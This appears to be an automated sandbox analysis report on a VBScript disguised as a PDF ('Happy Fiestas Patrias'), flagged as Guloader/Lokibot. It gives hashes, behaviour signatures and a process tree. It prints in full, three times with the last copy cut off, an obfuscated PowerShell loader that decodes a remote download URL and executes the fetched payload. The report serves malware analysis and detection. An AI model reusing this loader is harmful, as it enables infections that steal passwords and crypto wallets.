Analysis

  • max time kernel
    140s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25-09-2024 06:37

General

  • Target

    Happy Fiestas Patrias·pdf.vbs

  • Size

    30KB

  • MD5

    a08909dd22f1ef8eee277b3f178a65bd

  • SHA1

    30d67f8107a95d9a779aa010268421d3ecddb611

  • SHA256

    eed0935d0176fbb012006f4e41de769a2ef84fcb092f06b62be7ceb250d895d9

  • SHA512

    45c195eca97a2daefd2b245548f408c5c67c991f2adcd2d08520baafd3f9e99984cab3cff52c6cdd179b314963f069ed134e32c9827a3fdf6609288ed4d9f50e

  • SSDEEP

    768:hXwI+o49dnoX82Q/YoTprXzNQvD3L8LbEjWI:SI+5LX2NoTdq83EyI

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 3 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Happy Fiestas Patrias·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Hullabaloos Positionsangivelsen Scrab Claustrophobiac Kluntekro Shantungfrakkernes #>;$Ddstilhed='Dagligsprogsfilosofiers';<#Preguide Pone Amforaers udfoerslen Depilerede Conchie #>;$Fermis=$host.PrivateData;If ($Fermis) {$Hydrothorax++;}function Echinologist($Tailles){$kieselgur=$Tailles.Length-$Hydrothorax;for( $Originant=5;$Originant -lt $kieselgur;$Originant+=6){$Konsulaternes+=$Tailles[$Originant];}$Konsulaternes;}function Misrgt($Enjoins){ & ($Funeralizes) ($Enjoins);}$Eventualiteternes44=Echinologist 'Arse,MG nneo O kaz Non iVekselRadrelBegava A ko/Grand5Overa.B ode0Conce Konce(Ugli.WKr keiBugswnSalvodZool,oRekviw rydsOrnam andeN UngoTS.eln Huffa1Daint0wists.Milit0Ammon;Arbej Im reWSkaraiM.ljanMonos6Skrat4Sky t;Slgtn SlutvxBygue6Afbjn4Unc.l; pids Teresr Rillvmesom:Arbej1Ideam2Spejl1Skife.Bysv 0 Skol)Megar ChiliGChondeMeddec WagnkCykeloGifte/Insti2 Over0dygti1 A,tr0Attir0Modga1anste0Hnge.1Mdend ForbeF G rki IndorIndfrecobusf Si,eo Eksax U ug/Tvanm1Tolvt2scene1Heads.Choli0Gains ';$Discide=Echinologist 'Estrau Ur tSFornyEh,aneRDisen-Dea tA.goloGD tekEBuretNIsaleTH.mat ';$Chthonophagia=Echinologist 'UaflahSpanct FicutEveryp Lnn,sMa,ne:Forbj/Giant/ tyrid Forer LovpiBaccav vereStrug.HovedgGenbao AvocoJernhgjern lThe,neteeth.sy,afcImproo prrsmUmora/F,siou BleacUng n?BiplieC stixNglepp Fre oHydrorpileatArbej=BrnepdAbstro nfewS,tinnUnsc l FugtoForm aGyptodAplod&E stei Sq adTuris=Triet1UdstiOG saniBatrawRessoeTelevcI ratMUhens9 Amasi TibeuHjerns FluerUptru-Pent osamlipAnskaJSoli NSpectGArtisS diopUAfske7Pre,au ToguS,letfXCalypsEl,paAChrisjMis nTAssatu OpnagLefle8 M vibPartuQ .ipt ';$Daasemads=Echinologist 'Eig.t>obsku ';$Funeralizes=Echinologist 'D.kediDampbEK.ltuXforre ';$Garderofficers='Dagbder';$Rete = Echinologist ' ResueSvabecMonsthSonicoUnde. Inte%d mflaEfterp Flatp Sku dVenoua Furrt ongtaTroub%Nonfo\MisplAPrintrBankib B greStumfjkonfidGlycosskke fPintao MedfrCadmimKidna.FunarM ntioePe entStake vaa.n&Reven&Shone VigtieUdskrcSolidhOver.oPheno BildetP ogr ';Misrgt (Echinologist ' Sjus$HypocgJudgmlDossio ,egrb RisoaVortelAphod:Aegi,G Elver winsoMiaeovUprodssamueo N herPlet tErklaeM safr Var,ekoldsdKomedeMoppe=Overh(Tandlc OblimAggludChang Ufr h/ Co lcHyl e Tilfl$Ikon RDrifteTr.jet AmbeeRib,f)Forsg ');Misrgt (Echinologist ' Evol$UnpargAgterlHandeoPeytrbRetnia UngdlTre,v:gymnaA B cemUharmoKr,gvvRamulaC.emob ntenlskinneCenog= .tri$DoubtCBolsth Pa et IndbhAbdomo P.ecnClurioD,ylipShotwhTrimlaLatrig BarciMultiaNonin.Cic rsrgbomp Distl Snkei Wyndt Baga(Cater$ FratDAfloea ,rina Spinsstorme PlasmRestaaStilhdKubiksFaste) I tr ');Misrgt (Echinologist ' T,po[SerigNIns reClosetUndem.SkysoSF lkeetild rScar v yhei PoeccUreeleLerv PD uteoXylotiAmy,dnGeorgtHjemtMDuinha Be anBlinyaGeddegFemreeC romrLrer ]Sp ld:Trrev: PremSMidweeToit cPynteuBes.yrSc,ibi raadtSit.ayB.rerP Ult.rFri to IneftSymbioUndtacInhaloCrotclBorge Outt=Utopi Hvsse[BenetNUnoedeMuhamt usti.CadpaS Boeme.ontrcBrgsruLommerTur.ciBe.ent Prefy MatrPFedssrPulvioAdonitfrie o EnthcDinosopilhelc hobTS utnyUnderpPaakle D,sl] Toru:Skild:Bl mmT TeknlExpersBitte1Syste2Gel t ');$Chthonophagia=$Amovable[0];$Otohemineurasthenia239= (Echinologist 'Me ne$gangeGGenkeLBer.doTax,tBpligtaAfsliL Fo,l:Verdet njedAUnslopTh eaiLeukooarr gkSn ggaClinos Krsl=ManasNGruntECha uWD opo-beskyo.jergbWafflJHjhalEGarveC ,alutFll.s RagonSSidehy.edles Ch,vT StraeSquusmphson.,tarrNOsmogeArbejTOverc.KatalwslipcEMa thBByud c Diffl ypeIAfrydeCo.toNForreT');$Otohemineurasthenia239+=$Grovsorterede[1];Misrgt ($Otohemineurasthenia239);Misrgt (Echinologist 'Euroc$SubfiTUdvenaV.lgcpPan ri P choFiskekDopinapla,ssSpndb.BortfH Ra,he LektaDessidD ppeeMan mrBacchs Over[P ntu$BevilD Sed,iPlycys En ycOphobi algdPoplie Duft] Tran=Lysty$VisseE DemovUnfugeDes,rnPer et.lystuFllesaArbejlBeth iP ecot lelse,istetPresueKon ar precn SemieSondrsbinde4Car n4Retsm ');$vulcanising=Echinologist 'I mit$ araTBananaVir dpIm.asi,ntrkoSrstikCartoaUnadas Vejl.St,reDFarrootmme wAdjudnU dgalAlberoIdentaVaeggd T taFKrimiiVap elTopmee Bnde(Afsen$ LandCDiatohPo,ittAn lyhAtaraoAlaban uderoRockapHe.tihMi haa mpieg,trreiB sacaFluor,Cath,$ BrugSFu.unaQuoticFrilucBucklaFrem,tPantoePhantdJugos) Au o ';$Saccated=$Grovsorterede[0];Misrgt (Echinologist 'Sidde$Hueytg,tjdmlChinboPlankBSc reaKalkil Erhv:Hum rDKontriDugrusBlinkCReallOPletfVCal bEAnen rTilba=Vain (stabstForstE Be dsOrbitt E.id-AnalyP CommaRane T AcetHChori Acrot$ AndeS AlzhaOu plC TimecAfstiA AsunTSk tlEAfsttDAfgre)ikend ');while (!$Discover) {Misrgt (Echinologist 'Ba,ta$Un ragOligol albloSnustbsna.sa Strel ,nai:TrichPA,mrgiHabilfVarittrustieKingnnKommidMinise Jon sShi.e=Distr$ orlgtUdk tr,aneruEquipe Pred ') ;Misrgt $vulcanising;Misrgt (Echinologist ' DragSKogeut India Multrcr sst omm-hyoglS fje lBldgrehusfreMolehpVoldg Triv4Un,oo ');Misrgt (Echinologist 'Bogh,$ PerigMarmilAns.oo So abTop oa UnsolTen,a:PegboD IncriPodgisHypo.cSatiso Dub vDhubaeAftenrIndiv= B,bo(harmeT Sli eModkrsForretBrode- HypePcharmaPy alt kolehCla a Woma$WirycSFrbida,andicUngdoc Kr kaMaskitDen re Bir dHydro)Chain ') ;Misrgt (Echinologist 'Topng$Fermeg mo olQuisqoSinnebOrganaCocitl Besi:SdebaGCocu.einattlArthrafr,metAvissi TibinForglo GolfuDra,osQuillnUnytteScrapsStalwsLapse=Fortr$Sexfig ,rlilVaandoMlkeabElen.aMyrerlParfu:UnderkDisksuMyxedm HistmgtefdeCombirUn unfGarmeuPyrotlJallsdColla+Grani+Unend%Lftep$dollyALoek.mDobbeomicrovPrereaBrianbAs,ral joine.sagt.Heltec ,ffro.cameuCloudnTautotBuste ') ;$Chthonophagia=$Amovable[$Gelatinousness];}$Originantnfektionernes=327153;$Analysevrktjets=29478;Misrgt (Echinologist 'Gymna$InhabgSpro lHaandoAugusbLoy laBarbelUnder:Op reB Herma BetrgSlaafa tratom gneHi tolU,full PljeeNot,trUnindnRubi eMinersKenne Trans=P oto cratG DireeIndryt Terr-KilomCTils oS ormnPrebetEmotieReopenSmugltRet p Manxm$rin.lSA suraEclipc Kly,cRbdigaC pittnonscepapirdFradr ');Misrgt (Echinologist 'Vides$ utpog OverlfirhnoBerimbVandla zonel dkon:AmatrP UvoraKonstrFjer tHattyiCroupkBranda BorgmGollymCurtseu,nderCirc.aNonr t Udls Sabur=Grs n carti[VanfrSKilobyAvo,ts Tj,etM diceKrystmJi te.BevvyCSlveroKorpunFlosvvKhalieDis nr Uns,tCh ff]Oeill:Belli: P,rvFR,adgr DermoPseudm ZastB HestaAn oms Mi,ueRee.s6A sem4 erumSUr.ditProv.rLe.chiNdv,gnsplejgSmidi(I,pli$NeophB Mi.taTon ugL apfaStuditAs.erebrazelGeniilHekseeEnsterB ngnnLicheeUnrepsXant )Kam.e ');Misrgt (Echinologist ' Plan$Time gAilanlEkst.oHasarbbad tabrylll Br k: RoosKEileroRockenTritefPrj iuIrretnYamaldnoto e nderrLgtrieTo ngrDefen Cerem= ivej ,arla[CarilSSulfayPedansUnreftTsa,deF,rstmGe re.HundeTHospieSnri x Gropt Lrke.De,atE Fo tnFrforcTaxemoCreepdReseriNonconGonotgLeg t]Styrk: Ut,k:KonjaAbag.oS UdfoCMicroI BereICumul.JagteGTils.eTealetUnfaiS ncomtPyrolrdispeiUnbehnincorgProto( Reh.$O erdP,krigaBoggrr Ge rtWathfiKineskRegaiaGravemCompemRhab,e.reemrMedieaUps.etAm,lg)Reass ');Misrgt (Echinologist 'Tilse$ K,angReflelPjanko Beg bSjus.aUnstrl ddat:SaddlSGraveeKongesVed.iqNordsuLsniniLivsfbAstiga Femes erriLssedc rbor=Bonds$dampnKBevgeoFrasenHourifV.ljeuPebrenUnderdMena eEjendr Fetie St er Yder.Respes Br,gu Sk ubCanaisStrobtAe,oprTang iSammenTurm gFiske(Repul$ MicrOKontorSor.niPrepagP lsaiOrdren Du la Maken,egertDio.gnDuvesfUbemreHygrokPo metdveskiRasp.oResulnTwadde Titrr orgnUnpaselaagesTitan,Stra $CheckA FervnPseudaAtte,l triky DialsNonmaeAntiav,kyllr Br,skBelbstBevikjS olee MaustpreansA ten)Optio ');Misrgt $Sesquibasic;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2560
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Arbejdsform.Met && echo t"
        3⤵
          PID:2744
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Hullabaloos Positionsangivelsen Scrab Claustrophobiac Kluntekro Shantungfrakkernes #>;$Ddstilhed='Dagligsprogsfilosofiers';<#Preguide Pone Amforaers udfoerslen Depilerede Conchie #>;$Fermis=$host.PrivateData;If ($Fermis) {$Hydrothorax++;}function Echinologist($Tailles){$kieselgur=$Tailles.Length-$Hydrothorax;for( $Originant=5;$Originant -lt $kieselgur;$Originant+=6){$Konsulaternes+=$Tailles[$Originant];}$Konsulaternes;}function Misrgt($Enjoins){ & ($Funeralizes) ($Enjoins);}$Eventualiteternes44=Echinologist 'Arse,MG nneo O kaz Non iVekselRadrelBegava A ko/Grand5Overa.B ode0Conce Konce(Ugli.WKr keiBugswnSalvodZool,oRekviw rydsOrnam andeN UngoTS.eln Huffa1Daint0wists.Milit0Ammon;Arbej Im reWSkaraiM.ljanMonos6Skrat4Sky t;Slgtn SlutvxBygue6Afbjn4Unc.l; pids Teresr Rillvmesom:Arbej1Ideam2Spejl1Skife.Bysv 0 Skol)Megar ChiliGChondeMeddec WagnkCykeloGifte/Insti2 Over0dygti1 A,tr0Attir0Modga1anste0Hnge.1Mdend ForbeF G rki IndorIndfrecobusf Si,eo Eksax U ug/Tvanm1Tolvt2scene1Heads.Choli0Gains ';$Discide=Echinologist 'Estrau Ur tSFornyEh,aneRDisen-Dea tA.goloGD tekEBuretNIsaleTH.mat ';$Chthonophagia=Echinologist 'UaflahSpanct FicutEveryp Lnn,sMa,ne:Forbj/Giant/ tyrid Forer LovpiBaccav vereStrug.HovedgGenbao AvocoJernhgjern lThe,neteeth.sy,afcImproo prrsmUmora/F,siou BleacUng n?BiplieC stixNglepp Fre oHydrorpileatArbej=BrnepdAbstro nfewS,tinnUnsc l FugtoForm aGyptodAplod&E stei Sq adTuris=Triet1UdstiOG saniBatrawRessoeTelevcI ratMUhens9 Amasi TibeuHjerns FluerUptru-Pent osamlipAnskaJSoli NSpectGArtisS diopUAfske7Pre,au ToguS,letfXCalypsEl,paAChrisjMis nTAssatu OpnagLefle8 M vibPartuQ .ipt ';$Daasemads=Echinologist 'Eig.t>obsku ';$Funeralizes=Echinologist 'D.kediDampbEK.ltuXforre ';$Garderofficers='Dagbder';$Rete = Echinologist ' ResueSvabecMonsthSonicoUnde. Inte%d mflaEfterp Flatp Sku dVenoua Furrt ongtaTroub%Nonfo\MisplAPrintrBankib B greStumfjkonfidGlycosskke fPintao MedfrCadmimKidna.FunarM ntioePe entStake vaa.n&Reven&Shone VigtieUdskrcSolidhOver.oPheno BildetP ogr ';Misrgt (Echinologist ' Sjus$HypocgJudgmlDossio ,egrb RisoaVortelAphod:Aegi,G Elver winsoMiaeovUprodssamueo N herPlet tErklaeM safr Var,ekoldsdKomedeMoppe=Overh(Tandlc OblimAggludChang Ufr h/ Co lcHyl e Tilfl$Ikon RDrifteTr.jet AmbeeRib,f)Forsg ');Misrgt (Echinologist ' Evol$UnpargAgterlHandeoPeytrbRetnia UngdlTre,v:gymnaA B cemUharmoKr,gvvRamulaC.emob ntenlskinneCenog= .tri$DoubtCBolsth Pa et IndbhAbdomo P.ecnClurioD,ylipShotwhTrimlaLatrig BarciMultiaNonin.Cic rsrgbomp Distl Snkei Wyndt Baga(Cater$ FratDAfloea ,rina Spinsstorme PlasmRestaaStilhdKubiksFaste) I tr ');Misrgt (Echinologist ' T,po[SerigNIns reClosetUndem.SkysoSF lkeetild rScar v yhei PoeccUreeleLerv PD uteoXylotiAmy,dnGeorgtHjemtMDuinha Be anBlinyaGeddegFemreeC romrLrer ]Sp ld:Trrev: PremSMidweeToit cPynteuBes.yrSc,ibi raadtSit.ayB.rerP Ult.rFri to IneftSymbioUndtacInhaloCrotclBorge Outt=Utopi Hvsse[BenetNUnoedeMuhamt usti.CadpaS Boeme.ontrcBrgsruLommerTur.ciBe.ent Prefy MatrPFedssrPulvioAdonitfrie o EnthcDinosopilhelc hobTS utnyUnderpPaakle D,sl] Toru:Skild:Bl mmT TeknlExpersBitte1Syste2Gel t ');$Chthonophagia=$Amovable[0];$Otohemineurasthenia239= (Echinologist 'Me ne$gangeGGenkeLBer.doTax,tBpligtaAfsliL Fo,l:Verdet njedAUnslopTh eaiLeukooarr gkSn ggaClinos Krsl=ManasNGruntECha uWD opo-beskyo.jergbWafflJHjhalEGarveC ,alutFll.s RagonSSidehy.edles Ch,vT StraeSquusmphson.,tarrNOsmogeArbejTOverc.KatalwslipcEMa thBByud c Diffl ypeIAfrydeCo.toNForreT');$Otohemineurasthenia239+=$Grovsorterede[1];Misrgt ($Otohemineurasthenia239);Misrgt (Echinologist 'Euroc$SubfiTUdvenaV.lgcpPan ri P choFiskekDopinapla,ssSpndb.BortfH Ra,he LektaDessidD ppeeMan mrBacchs Over[P ntu$BevilD Sed,iPlycys En ycOphobi algdPoplie Duft] Tran=Lysty$VisseE DemovUnfugeDes,rnPer et.lystuFllesaArbejlBeth iP ecot lelse,istetPresueKon ar precn SemieSondrsbinde4Car n4Retsm ');$vulcanising=Echinologist 'I mit$ araTBananaVir dpIm.asi,ntrkoSrstikCartoaUnadas Vejl.St,reDFarrootmme wAdjudnU dgalAlberoIdentaVaeggd T taFKrimiiVap elTopmee Bnde(Afsen$ LandCDiatohPo,ittAn lyhAtaraoAlaban uderoRockapHe.tihMi haa mpieg,trreiB sacaFluor,Cath,$ BrugSFu.unaQuoticFrilucBucklaFrem,tPantoePhantdJugos) Au o ';$Saccated=$Grovsorterede[0];Misrgt (Echinologist 'Sidde$Hueytg,tjdmlChinboPlankBSc reaKalkil Erhv:Hum rDKontriDugrusBlinkCReallOPletfVCal bEAnen rTilba=Vain (stabstForstE Be dsOrbitt E.id-AnalyP CommaRane T AcetHChori Acrot$ AndeS AlzhaOu plC TimecAfstiA AsunTSk tlEAfsttDAfgre)ikend ');while (!$Discover) {Misrgt (Echinologist 'Ba,ta$Un ragOligol albloSnustbsna.sa Strel ,nai:TrichPA,mrgiHabilfVarittrustieKingnnKommidMinise Jon sShi.e=Distr$ orlgtUdk tr,aneruEquipe Pred ') ;Misrgt $vulcanising;Misrgt (Echinologist ' DragSKogeut India Multrcr sst omm-hyoglS fje lBldgrehusfreMolehpVoldg Triv4Un,oo ');Misrgt (Echinologist 'Bogh,$ PerigMarmilAns.oo So abTop oa UnsolTen,a:PegboD IncriPodgisHypo.cSatiso Dub vDhubaeAftenrIndiv= B,bo(harmeT Sli eModkrsForretBrode- HypePcharmaPy alt kolehCla a Woma$WirycSFrbida,andicUngdoc Kr kaMaskitDen re Bir dHydro)Chain ') ;Misrgt (Echinologist 'Topng$Fermeg mo olQuisqoSinnebOrganaCocitl Besi:SdebaGCocu.einattlArthrafr,metAvissi TibinForglo GolfuDra,osQuillnUnytteScrapsStalwsLapse=Fortr$Sexfig ,rlilVaandoMlkeabElen.aMyrerlParfu:UnderkDisksuMyxedm HistmgtefdeCombirUn unfGarmeuPyrotlJallsdColla+Grani+Unend%Lftep$dollyALoek.mDobbeomicrovPrereaBrianbAs,ral joine.sagt.Heltec ,ffro.cameuCloudnTautotBuste ') ;$Chthonophagia=$Amovable[$Gelatinousness];}$Originantnfektionernes=327153;$Analysevrktjets=29478;Misrgt (Echinologist 'Gymna$InhabgSpro lHaandoAugusbLoy laBarbelUnder:Op reB Herma BetrgSlaafa tratom gneHi tolU,full PljeeNot,trUnindnRubi eMinersKenne Trans=P oto cratG DireeIndryt Terr-KilomCTils oS ormnPrebetEmotieReopenSmugltRet p Manxm$rin.lSA suraEclipc Kly,cRbdigaC pittnonscepapirdFradr ');Misrgt (Echinologist 'Vides$ utpog OverlfirhnoBerimbVandla zonel dkon:AmatrP UvoraKonstrFjer tHattyiCroupkBranda BorgmGollymCurtseu,nderCirc.aNonr t Udls Sabur=Grs n carti[VanfrSKilobyAvo,ts Tj,etM diceKrystmJi te.BevvyCSlveroKorpunFlosvvKhalieDis nr Uns,tCh ff]Oeill:Belli: P,rvFR,adgr DermoPseudm ZastB HestaAn oms Mi,ueRee.s6A sem4 erumSUr.ditProv.rLe.chiNdv,gnsplejgSmidi(I,pli$NeophB Mi.taTon ugL apfaStuditAs.erebrazelGeniilHekseeEnsterB ngnnLicheeUnrepsXant )Kam.e ');Misrgt (Echinologist ' Plan$Time gAilanlEkst.oHasarbbad tabrylll Br k: RoosKEileroRockenTritefPrj iuIrretnYamaldnoto e nderrLgtrieTo ngrDefen Cerem= ivej ,arla[CarilSSulfayPedansUnreftTsa,deF,rstmGe re.HundeTHospieSnri x Gropt Lrke.De,atE Fo tnFrforcTaxemoCreepdReseriNonconGonotgLeg t]Styrk: Ut,k:KonjaAbag.oS UdfoCMicroI BereICumul.JagteGTils.eTealetUnfaiS ncomtPyrolrdispeiUnbehnincorgProto( Reh.$O erdP,krigaBoggrr Ge rtWathfiKineskRegaiaGravemCompemRhab,e.reemrMedieaUps.etAm,lg)Reass ');Misrgt (Echinologist 'Tilse$ K,angReflelPjanko Beg bSjus.aUnstrl ddat:SaddlSGraveeKongesVed.iqNordsuLsniniLivsfbAstiga Femes erriLssedc rbor=Bonds$dampnKBevgeoFrasenHourifV.ljeuPebrenUnderdMena eEjendr Fetie St er Yder.Respes Br,gu Sk ubCanaisStrobtAe,oprTang iSammenTurm gFiske(Repul$ MicrOKontorSor.niPrepagP lsaiOrdren Du la Maken,egertDio.gnDuvesfUbemreHygrokPo metdveskiRasp.oResulnTwadde Titrr orgnUnpaselaagesTitan,Stra $CheckA FervnPseudaAtte,l triky DialsNonmaeAntiav,kyllr Br,skBelbstBevikjS olee MaustpreansA ten)Optio ');Misrgt $Sesquibasic;"
          3⤵
          • System Time Discovery
          • Suspicious use of WriteProcessMemory
          PID:2044
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Hullabaloos Positionsangivelsen Scrab Claustrophobiac Kluntekro Shantungfrakkernes #>;$Ddstilhed='Dagligsprogsfilosofiers';<#Preguide Pone Amforaers udfoerslen Depilerede Conchie #>;$Fermis=$host.PrivateData;If ($Fermis) {$Hydrothorax++;}function Echinologist($Tailles){$kieselgur=$Tailles.Length-$Hydrothorax;for( $Originant=5;$Originant -lt $kieselgur;$Originant+=6){$Konsulaternes+=$Tailles[$Originant];}$Konsulaternes;}function Misrgt($Enjoins){ & ($Funeralizes) ($Enjoins);}$Eventualiteternes44=Echinologist 'Arse,MG nneo O kaz Non iVekselRadrelBegava A ko/Grand5Overa.B ode0Conce Konce(Ugli.WKr keiBugswnSalvodZool,oRekviw rydsOrnam andeN UngoTS.eln Huffa1Daint0wists.Milit0Ammon;Arbej Im reWSkaraiM.ljanMonos6Skrat4Sky t;Slgtn SlutvxBygue6Afbjn4Unc.l; pids Teresr Rillvmesom:Arbej1Ideam2Spejl1Skife.Bysv 0 Skol)Megar ChiliGChondeMeddec WagnkCykeloGifte/Insti2 Over0dygti1 A,tr0Attir0Modga1anste0Hnge.1Mdend ForbeF G rki IndorIndfrecobusf Si,eo Eksax U ug/Tvanm1Tolvt2scene1Heads.Choli0Gains ';$Discide=Echinologist 'Estrau Ur tSFornyEh,aneRDisen-Dea tA.goloGD tekEBuretNIsaleTH.mat ';$Chthonophagia=Echinologist 'UaflahSpanct FicutEveryp Lnn,sMa,ne:Forbj/Giant/ tyrid Forer LovpiBaccav vereStrug.HovedgGenbao AvocoJernhgjern lThe,neteeth.sy,afcImproo prrsmUmora/F,siou BleacUng n?BiplieC stixNglepp Fre oHydrorpileatArbej=BrnepdAbstro nfewS,tinnUnsc l FugtoForm aGyptodAplod&E stei Sq adTuris=Triet1UdstiOG saniBatrawRessoeTelevcI ratMUhens9 Amasi TibeuHjerns FluerUptru-Pent osamlipAnskaJSoli NSpectGArtisS diopUAfske7Pre,au ToguS,letfXCalypsEl,paAChrisjMis nTAssatu OpnagLefle8 M vibPartuQ .ipt ';$Daasemads=Echinologist 'Eig.t>obsku ';$Funeralizes=Echinologist 'D.kediDampbEK.ltuXforre ';$Garderofficers='Dagbder';$Rete = Echinologist ' ResueSvabecMonsthSonicoUnde. Inte%d mflaEfterp Flatp Sku dVenoua Furrt ongtaTroub%Nonfo\MisplAPrintrBankib B greStumfjkonfidGlycosskke fPintao MedfrCadmimKidna.FunarM ntioePe entStake vaa.n&Reven&Shone VigtieUdskrcSolidhOver.oPheno BildetP ogr ';Misrgt (Echinologist ' Sjus$HypocgJudgmlDossio ,egrb RisoaVortelAphod:Aegi,G Elver winsoMiaeovUprodssamueo N herPlet tErklaeM safr Var,ekoldsdKomedeMoppe=Overh(Tandlc OblimAggludChang Ufr h/ Co lcHyl e Tilfl$Ikon RDrifteTr.jet AmbeeRib,f)Forsg ');Misrgt (Echinologist ' Evol$UnpargAgterlHandeoPeytrbRetnia UngdlTre,v:gymnaA B cemUharmoKr,gvvRamulaC.emob ntenlskinneCenog= .tri$DoubtCBolsth Pa et IndbhAbdomo P.ecnClurioD,ylipShotwhTrimlaLatrig BarciMultiaNonin.Cic rsrgbomp Distl Snkei Wyndt Baga(Cater$ FratDAfloea ,rina Spinsstorme PlasmRestaaStilhdKubiksFaste) I tr ');Misrgt (Echinologist ' T,po[SerigNIns reClosetUndem.SkysoSF lkeetild rScar v yhei PoeccUreeleLerv PD uteoXylotiAmy,dnGeorgtHjemtMDuinha Be anBlinyaGeddegFemreeC romrLrer ]Sp ld:Trrev: PremSMidweeToit cPynteuBes.yrSc,ibi raadtSit.ayB.rerP Ult.rFri to IneftSymbioUndtacInhaloCrotclBorge Outt=Utopi Hvsse[BenetNUnoedeMuhamt usti.CadpaS Boeme.ontrcBrgsruLommerTur.ciBe.ent Prefy MatrPFedssrPulvioAdonitfrie o EnthcDinosopilhelc hobTS utnyUnderpPaakle D,sl] Toru:Skild:Bl mmT TeknlExpersBitte1Syste2Gel t ');$Chthonophagia=$Amovable[0];$Otohemineurasthenia239= (Echinologist 'Me ne$gangeGGenkeLBer.doTax,tBpligtaAfsliL Fo,l:Verdet njedAUnslopTh eaiLeukooarr gkSn ggaClinos Krsl=ManasNGruntECha uWD opo-beskyo.jergbWafflJHjhalEGarveC ,alutFll.s RagonSSidehy.edles Ch,vT StraeSquusmphson.,tarrNOsmogeArbejTOverc.KatalwslipcEMa thBByud c Diffl ypeIAfrydeCo.toNForreT');$Otohemineurasthenia239+=$Grovsorterede[1];Misrgt ($Otohemineurasthenia239);Misrgt (Echinologist 'Euroc$SubfiTUdvenaV.lgcpPan ri P choFiskekDopinapla,ssSpndb.BortfH Ra,he LektaDessidD ppeeMan mrBacchs Over[P ntu$BevilD Sed,iPlycys En ycOphobi algdPoplie Duft] Tran=Lysty$VisseE DemovUnfugeDes,rnPer et.lystuFllesaArbejlBeth iP ecot lelse,istetPresueKon ar precn SemieSondrsbinde4Car n4Retsm ');$vulcanising=Echinologist 'I mit$ araTBananaVir dpIm.asi,ntrkoSrstikCartoaUnadas Vejl.St,reDFarrootmme wAdjudnU dgalAlberoIdentaVaeggd T taFKrimiiVap elTopmee Bnde(Afsen$ LandCDiatohPo,ittAn lyhAtaraoAlaban uderoRockapHe.tihMi haa mpieg,trreiB sacaFluor,Cath,$ BrugSFu.unaQuoticFrilucBucklaFrem,tPantoePhantdJugos) Au o ';$Saccated=$Grovsorterede[0];Misrgt (Echinologist 'Sidde$Hueytg,tjdmlChinboPlankBSc reaKalkil Erhv:Hum rDKontriDugrusBlinkCReallOPletfVCal bEAnen rTilba=Vain (stabstForstE Be dsOrbitt E.id-AnalyP CommaRane T AcetHChori Acrot$ AndeS AlzhaOu plC TimecAfstiA AsunTSk tlEAfsttDAfgre)ikend ');while (!$Discover) {Misrgt (Echinologist 'Ba,ta$Un ragOligol albloSnustbsna.sa Strel ,nai:TrichPA,mrgiHabilfVarittrustieKingnnKommidMinise Jon sShi.e=Distr$ orlgtUdk tr,aneruEquipe Pred ') ;Misrgt $vulcanising;Misrgt (Echinologist ' DragSKogeut India Multrcr sst omm-hyoglS fje lBldgrehusfreMolehpVoldg Triv4Un,oo ');Misrgt (Echinologist 'Bogh,$ PerigMarmilAns.oo So abTop oa UnsolTen,a:PegboD IncriPodgisHypo.cSatiso Dub vDhubaeAftenrIndiv= B,bo(harmeT Sli eModkrsForretBrode- HypePcharmaPy alt kolehCla a Woma$WirycSFrbida,andicUngdoc Kr kaMaskitDen re Bir dHydro)Chain ') ;Misrgt (Echinologist 'Topng$Fermeg mo olQuisqoSinnebOrganaCocitl Besi:SdebaGCocu.einattlArthrafr,metAvissi TibinForglo GolfuDra,osQuillnUnytteScrapsStalwsLapse=Fortr$Sexfig ,rlilVaandoMlkeabElen.aMyrerlParfu:UnderkDisksuMyxedm HistmgtefdeCombirUn unfGarmeuPyrotlJallsdColla+Grani+Unend%Lftep$dollyALoek.mDobbeomicrovPrereaBrianbAs,ral joine.sagt.Heltec ,ffro.cameuCloudnTautotBuste ') ;$Chthonophagia=$Amovable[$Gelatinousness];}$Originantnfektionernes=327153;$Analysevrktjets=29478;Misrgt (Echinologist 'Gymna$InhabgSpro lHaandoAugusbLoy laBarbelUnder:Op reB Herma BetrgSlaafa tratom gneHi tolU,full 